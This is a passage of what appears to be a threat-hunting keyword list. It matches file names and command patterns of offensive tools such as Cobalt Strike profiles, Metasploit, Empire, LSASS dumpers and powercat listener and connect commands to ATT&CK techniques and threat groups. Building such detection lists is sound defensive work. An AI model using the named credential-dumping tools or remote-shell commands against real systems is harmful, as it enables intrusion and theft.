be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*post_breach_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*post_ex_amsi_disable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Post_EX_Process_Name*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*post_ex_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_spawnto_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_spawnto_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*POST_EXPLOIT_DIR*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*post_exploitation.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*PostDump.exe *","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*POSTDump-main*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*postgres_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*postgres_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PostMulitDomainSpider.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PostMulitMsfGetDomainInfoByBloodHound.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PostPowershellPowerViewAddNetUser.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PostPowershellPowerViewGetNetGroup.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PostPowershellPowerViewGetNetGroupMember.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PostPowershellPowerViewGetNetProcess.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PostPowershellPowerViewUserHunter.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PostRewMsfAuxiliaryCVE*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PostRewMsfExample.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PostRewMsfPostConfInfos.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PotatoTrigger.cpp*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*PotatoTrigger.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*PowerBreach.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerBruteLogon.*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*powercat -c * -p *","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*powercat -l -p 4444*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Powercat.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*powerdump.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*powerdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PowerExtract-main.zip*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" +"*PowerForensics*","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Information Gathering","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","10","1324","286","2022-05-20T14:43:10Z","2015-03-07T17:12:19Z" +"*powerglot.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*powerkatz.dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*powerkatz_x64.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*powerkatz_x86.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*PowerLessShell*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*PowerLessShell.py*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*powermad.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Powermad.psd1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Powermad.psm1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST 